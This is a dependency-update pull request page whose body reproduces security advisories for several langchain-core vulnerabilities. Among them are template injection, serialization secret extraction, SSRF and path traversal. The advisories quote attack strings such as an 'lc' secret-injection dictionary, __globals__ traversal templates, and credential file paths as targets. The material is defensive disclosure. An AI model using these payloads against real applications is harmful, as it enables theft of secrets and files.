chore(deps): update dependency langchain-core to v1 [security] - autoclosed#153
Closed
renovate-bot wants to merge 1 commit intogoogleapis:mainfrom
Closed
Conversation
|
/gcbrun |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
>=0.1.1, <1.0.0→>=1.2.22, <1.2.23==0.2.31→==1.2.22langchain-core allows unauthorized users to read arbitrary files from the host file system
CVE-2024-10940 / GHSA-5chr-fjjv-38qv
More information
Details
A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate's (and by extension langchain_core.prompts.ChatPromptTemplate's) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead to the exposure of sensitive information.
Severity
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain Vulnerable to Template Injection via Attribute Access in Prompt Templates
CVE-2025-65106 / GHSA-6qv9-48xg-fc7f
More information
Details
Context
A template injection vulnerability exists in LangChain's prompt template system that allows attackers to access Python object internals through template syntax. This vulnerability affects applications that accept untrusted template strings (not just template variables) in
ChatPromptTemplateand related prompt template classes.Templates allow attribute access (
.) and indexing ([]) but not method invocation (()).The combination of attribute access and indexing may enable exploitation depending on which objects are passed to templates. When template variables are simple strings (the common case), the impact is limited. However, when using
MessagesPlaceholderwith chat message objects, attackers can traverse through object attributes and dictionary lookups (e.g.,__globals__) to reach sensitive data such as environment variables.The vulnerability specifically requires that applications accept template strings (the structure) from untrusted sources, not just template variables (the data). Most applications either do not use templates or else use hardcoded templates and are not vulnerable.
Affected Components
langchain-corepackagetemplate_format="f-string") - Vulnerability fixedtemplate_format="mustache") - Defensive hardeningtemplate_format="jinja2") - Defensive hardeningImpact
Attackers who can control template strings (not just template variables) can:
__class__,__globals__)Attack Vectors
1. F-string Template Injection
Before Fix:
2. Mustache Template Injection
Before Fix:
3. Jinja2 Template Injection
Before Fix:
Root Cause
string.Formatter().parse()to extract variable names from template strings. This method returns the complete field expression, including attribute access syntax:{obj.__class__.__name__}or{obj.method.__globals__[os]}) were accepted and subsequently evaluated during formatting. While f-string templates do not support method calls with(), they do support[]indexing, which could allow traversal through dictionaries like__globals__to reach sensitive objects.getattr()as a fallback to support accessing attributes on objects (e.g., `` on a User object). However, we decided to restrict this to simpler primitives that subclass dict, list, and tuple types as defensive hardening, since untrusted templates could exploit attribute access to reach internal properties like class on arbitrary objectsSandboxedEnvironmentblocks dunder attributes (e.g.,__class__) but permits access to other attributes and methods on objects. While Jinja2 templates in LangChain are typically used with trusted template strings, as a defense-in-depth measure, we've restricted the environment to block all attribute and method access on objectspassed to templates.
Who Is Affected?
High Risk Scenarios
You are affected if your application:
Example vulnerable code:
Low/No Risk Scenarios
You are NOT affected if:
Example safe code:
The Fix
F-string Templates
F-string templates had a clear vulnerability where attribute access syntax was exploitable. We've added strict validation to prevent this:
{obj.attr},{obj[0]}, or{obj.__class__}{variable_name}Mustache Templates (Defensive Hardening)
As defensive hardening, we've restricted what Mustache templates support to reduce the attack surface:
getattr()fallback with strict type checkingdict,list, andtupletypesJinja2 Templates (Defensive Hardening)
As defensive hardening, we've significantly restricted Jinja2 template capabilities:
_RestrictedSandboxedEnvironmentthat blocks ALL attribute/method accessSecurityErroron any attribute access attemptImportant Recommendation: Due to the expressiveness of Jinja2 and the difficulty of fully sandboxing it, we recommend reserving Jinja2 templates for trusted sources only. If you need to accept template strings from untrusted users, use f-string or mustache templates with the new restrictions instead.
While we've hardened the Jinja2 implementation, the nature of templating engines makes comprehensive sandboxing challenging. The safest approach is to only use Jinja2 templates when you control the template source.
Important Reminder: Many applications do not need prompt templates. Templates are useful for variable substitution and dynamic logic (if statements, loops, conditionals). However, if you're building a chatbot or conversational application, you can often work directly with message objects (e.g.,
HumanMessage,AIMessage,ToolMessage) without templates. Direct message construction avoids template-related security concerns entirely.Remediation
Immediate Actions
langchain-coreBest Practices
HumanMessage,AIMessage, etc.) without templates## ContextA template injection vulnerability exists in LangChain's prompt template system that allows attackers to access Python object internals through template syntax. This vulnerability affects applications that accept untrusted template strings (not just template variables) in
ChatPromptTemplateand related prompt template classes.Templates allow attribute access (
.) and indexing ([]) but not method invocation (()).The combination of attribute access and indexing may enable exploitation depending on which objects are passed to templates. When template variables are simple strings (the common case), the impact is limited. However, when using
MessagesPlaceholderwith chat message objects, attackers can traverse through object attributes and dictionary lookups (e.g.,__globals__) to reach sensitive data such as environment variables.The vulnerability specifically requires that applications accept template strings (the structure) from untrusted sources, not just template variables (the data). Most applications either do not use templates or else use hardcoded templates and are not vulnerable.
Affected Components
langchain-corepackagetemplate_format="f-string") - Vulnerability fixedtemplate_format="mustache") - Defensive hardeningtemplate_format="jinja2") - Defensive hardeningImpact
Attackers who can control template strings (not just template variables) can:
__class__,__globals__)Attack Vectors
1. F-string Template Injection
Before Fix:
2. Mustache Template Injection
Before Fix:
3. Jinja2 Template Injection
Before Fix:
Root Cause
string.Formatter().parse()to extract variable names from template strings. This method returns the complete field expression, including attribute access syntax:{obj.__class__.__name__}or{obj.method.__globals__[os]}) were accepted and subsequently evaluated during formatting. While f-string templates do not support method calls with(), they do support[]indexing, which could allow traversal through dictionaries like__globals__to reach sensitive objects.getattr()as a fallback to support accessing attributes on objects (e.g., `` on a User object). However, we decided to restrict this to simpler primitives that subclass dict, list, and tuple types as defensive hardening, since untrusted templates could exploit attribute access to reach internal properties like class on arbitrary objectsSandboxedEnvironmentblocks dunder attributes (e.g.,__class__) but permits access to other attributes and methods on objects. While Jinja2 templates in LangChain are typically used with trusted template strings, as a defense-in-depth measure, we've restricted the environment to block all attribute and method access on objectspassed to templates.
Who Is Affected?
High Risk Scenarios
You are affected if your application:
Example vulnerable code:
Low/No Risk Scenarios
You are NOT affected if:
Example safe code:
The Fix
F-string Templates
F-string templates had a clear vulnerability where attribute access syntax was exploitable. We've added strict validation to prevent this:
{obj.attr},{obj[0]}, or{obj.__class__}{variable_name}Mustache Templates (Defensive Hardening)
As defensive hardening, we've restricted what Mustache templates support to reduce the attack surface:
getattr()fallback with strict type checkingdict,list, andtupletypesJinja2 Templates (Defensive Hardening)
As defensive hardening, we've significantly restricted Jinja2 template capabilities:
_RestrictedSandboxedEnvironmentthat blocks ALL attribute/method accessSecurityErroron any attribute access attemptImportant Recommendation: Due to the expressiveness of Jinja2 and the difficulty of fully sandboxing it, we recommend reserving Jinja2 templates for trusted sources only. If you need to accept template strings from untrusted users, use f-string or mustache templates with the new restrictions instead.
While we've hardened the Jinja2 implementation, the nature of templating engines makes comprehensive sandboxing challenging. The safest approach is to only use Jinja2 templates when you control the template source.
Important Reminder: Many applications do not need prompt templates. Templates are useful for variable substitution and dynamic logic (if statements, loops, conditionals). However, if you're building a chatbot or conversational application, you can often work directly with message objects (e.g.,
HumanMessage,AIMessage,ToolMessage) without templates. Direct message construction avoids template-related security concerns entirely.Remediation
Immediate Actions
langchain-coreBest Practices
HumanMessage,AIMessage, etc.) without templatesUpdate: Jinja2 Restrictions Reverted
The Jinja2 hardening introduced in the initial patch has been reverted as of
langchain-core1.1.3. The restriction was not addressing a direct vulnerability but was part of broader defensive hardening. In practice, it significantly limited legitimate Jinja2 usage and broke existing templates. Since Jinja2 is intended to be used only with trusted template sources, the original behavior has been restored. Users should continue to avoid accepting untrusted template strings when using Jinja2, but no security issue exists with trusted templates.Severity
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs
CVE-2025-68664 / GHSA-c67j-w6g6-q2cm
More information
Details
Summary
A serialization injection vulnerability exists in LangChain's
dumps()anddumpd()functions. The functions do not escape dictionaries with'lc'keys when serializing free-form dictionaries. The'lc'key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.Attack surface
The core vulnerability was in
dumps()anddumpd(): these functions failed to escape user-controlled dictionaries containing'lc'keys. When this unescaped data was later deserialized viaload()orloads(), the injected structures were treated as legitimate LangChain objects rather than plain user data.This escaping bug enabled several attack vectors:
metadata,additional_kwargs, orresponse_metadataSerializablesubclass, but only within the pre-approved trusted namespaces (langchain_core,langchain,langchain_community). This includes classes with side effects in__init__(network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.Security hardening
This patch fixes the escaping bug in
dumps()anddumpd()and introduces new restrictive defaults inload()andloads(): allowlist enforcement viaallowed_objects="core"(restricted to serialization mappings),secrets_from_envchanged fromTruetoFalse, and default Jinja2 template blocking viainit_validator. These are breaking changes for some use cases.Who is affected?
Applications are vulnerable if they:
astream_events(version="v1")— The v1 implementation internally uses vulnerable serialization. Note:astream_events(version="v2")is not vulnerable.Runnable.astream_log()— This method internally uses vulnerable serialization for streaming outputs.dumps()ordumpd()on untrusted data, then deserialize withload()orloads()— Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains'lc'key structures.load()orloads()— Directly deserializing untrusted data that may contain injected'lc'structures.RunnableWithMessageHistory— Internal serialization in message history handling.InMemoryVectorStore.load()to deserialize untrusted documents.langchain-communitycaches.hub.pull.StringRunEvaluatorChainon untrusted runs.create_lc_storeorcreate_kv_docstorewith untrusted documents.MultiVectorRetrieverwith byte stores containing untrusted documents.LangSmithRunChatLoaderwith runs containing untrusted messages.The most common attack vector is through LLM response fields like
additional_kwargsorresponse_metadata, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.Impact
Attackers who control serialized data can extract environment variable secrets by injecting
{"lc": 1, "type": "secret", "id": ["ENV_VAR"]}to load environment variables during deserialization (whensecrets_from_env=True, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.Key severity factors:
secrets_from_env=True(the old default)additional_kwargscan be controlled via prompt injectionExploit example
Security hardening changes (breaking changes)
This patch introduces three breaking changes to
load()andloads():allowed_objectsparameter (defaults to'core'): Enforces allowlist of classes that can be deserialized. The'all'option corresponds to the list of objects specified inmappings.pywhile the'core'option limits to objects withinlangchain_core. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.secrets_from_envdefault changed fromTruetoFalse: Disables automatic secret loading from environmentinit_validatorparameter (defaults todefault_init_validator): Blocks Jinja2 templates by defaultMigration guide
No changes needed for most users
If you're deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like
ChatOpenAI,ChatAnthropic, etc.), your code will work without changes:For custom classes
If you're deserializing custom classes not in the serialization mappings, add them to the allowlist:
For Jinja2 templates
Jinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass
init_validator=None:For secrets from environment
secrets_from_envnow defaults toFalse. If you need to load secrets from environment variables:Credits
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages
CVE-2026-26013 / GHSA-2g6r-c272-w58r
More information
Details
Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting
Summary
The
ChatOpenAI.get_num_tokens_from_messages()method fetches arbitraryimage_urlvalues without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.Severity
Low - The vulnerability allows SSRF attacks but has limited impact due to:
Impact
An attacker who can control image URLs passed to
get_num_tokens_from_messages()can:Note: This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).
Details
The vulnerable code path:
get_num_tokens_from_messages()processes messages containingimage_urlcontent blocksdetail: "low", it calls_url_to_size()to fetch the image and compute token counts_url_to_size()performshttpx.get(image_source)on any URL without validationFile:
libs/partners/openai/langchain_openai/chat_models/base.pyPatches
The vulnerability has been patched in
langchain-openai==1.1.9(requireslangchain-core==1.2.11).The patch adds:
langchain_core._security._ssrf_protection.validate_safe_url()to block:httpx.getdefault)allow_fetching_images=FalseparameterWorkarounds
If you cannot upgrade immediately:
image_urlvalues before passing messages to token counting or model invocationSeverity
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:LReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain Core has Path Traversal vulnerabilites in legacy
load_promptfunctionsCVE-2026-34070 / GHSA-qh6h-p6c9-ff54
More information
Details
Summary
Multiple functions in
langchain_core.prompts.loadingread files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations toload_prompt()orload_prompt_from_config(), an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (.txtfor templates,.json/.yamlfor examples).Note: The affected functions (
load_prompt,load_prompt_from_config, and the.save()method on prompt classes) are undocumented legacy APIs. They are superseded by thedumpd/dumps/load/loadsserialization APIs inlangchain_core.load, which do not perform filesystem reads and use an allowlist-based security model. As part of this fix, the legacy APIs have been formally deprecated and will be removed in 2.0.0.Affected component
Package:
langchain-coreFile:
langchain_core/prompts/loading.pyAffected functions:
_load_template(),_load_examples(),_load_few_shot_prompt()Severity
High
The score reflects the file-extension constraints that limit which files can be read.
Vulnerable code paths
template_path,suffix_path,prefix_path_load_template().txtexamples(when string)_load_examples().json,.yaml,.ymlexample_prompt_path_load_few_shot_prompt().json,.yaml,.ymlNone of these code paths validated the supplied path against absolute path injection or
..traversal sequences before reading from disk.Impact
An attacker who controls or influences the prompt configuration dict can read files outside the intended directory:
.txtfiles: cloud-mounted secrets (/mnt/secrets/api_key.txt),requirements.txt, internal system prompts.json/.yamlfiles: cloud credentials (~/.docker/config.json,~/.azure/accessTokens.json), Kubernetes manifests, CI/CD configs, application settingsThis is exploitable in applications that accept prompt configs from untrusted sources, including low-code AI builders and API wrappers that expose
load_prompt_from_config().Proof of concept
Mitigation
Update
langchain-coreto >= 1.2.22.The fix adds path validation that rejects absolute paths and
..traversal sequences by default. Anallow_dangerous_paths=Truekeyword argument is available onload_prompt()andload_prompt_from_config()for trusted inputs.As described above, these legacy APIs have been formally deprecated. Users should migrate to
dumpd/dumps/load/loadsfromlangchain_core.load.Credit
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
LangChain has incomplete f-string validation in prompt templates
CVE-2026-40087 / GHSA-926x-3r5x-gfhw
More information
Details
LangChain's f-string prompt-template validation was incomplete in two respects.
First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as
PromptTemplate. In particular,DictPromptTemplateandImagePromptTemplatecould accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting.Examples of the affected shape include:
Second, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:
"{name:{name.__class__.__name__}}"In this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.
Affected usage
This issue is only relevant for applications that accept untrusted template strings, rather than only untrusted template variable values.
In addition, practical impact depends on what objects are passed into template formatting:
In many deployments, these conditions are not commonly present together. Applications that allow end users to author arbitrary templates often expose only a narrow set of simple template variables, while applications that work with richer internal Python objects often keep template structure under developer control. As a result, the highest-impact scenario is plausible but is not representative of all LangChain applications.
Applications that use hardcoded templates or that only allow users to provide variable values are not affected by this issue.
Impact
The direct issue in
DictPromptTemplateandImagePromptTemplateallowed attribute access and indexing expressions to survive template construction and then be evaluated during formatting. When richer Python objects were passed into formatting, this could expose internal fields or nested data to prompt output, model context, or logs.The nested format-spec issue is narrower in scope. It bypassed the intended validation rules for f-string templates, but in simple cases it results in an invalid format specifier error rather than direct disclosure. Accordingly, its practical impact is lower than that of direct top-level attribute traversal.
Overall, the practical severity depends on deployment. Meaningful confidentiality impact requires attacker control over the template structure itself, and higher impact further depends on the surrounding application passing richer internal Python objects into formatting.
Fix
The fix consists of two changes.
First, LangChain now applies f-string safety validation consistently to
DictPromptTemplateandImagePromptTemplate, so templates containing attribute access or indexing expressions are rejected during construction and deserialization.Second, LangChain now rejects nested replacement fields inside f-string format specifiers.
Concretely, LangChain validates parsed f-string fields and raises an error for:
.or[]{or}This blocks templates such as:
The fix preserves ordinary f-string formatting features such as standard format specifiers and conversions, including examples like:
In addition, the explicit template-validation path now applies the same structural f-string checks before performing placeholder validation, ensuring that the security checks and validation checks remain aligned.
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Release Notes
langchain-ai/langchain (langchain-core)
v0.1.16Compare Source
What's Changed
_load_sql_databse_chainby @B-Step62 in #19908New Contributors
Full Changelog: langchain-ai/langchain@v0.1.15...v0.1.16
v0.1.15Compare Source
What's Changed
Configuration
📅 Schedule: (UTC)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Never, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about these updates again.
This PR was generated by Mend Renovate. View the repository job log.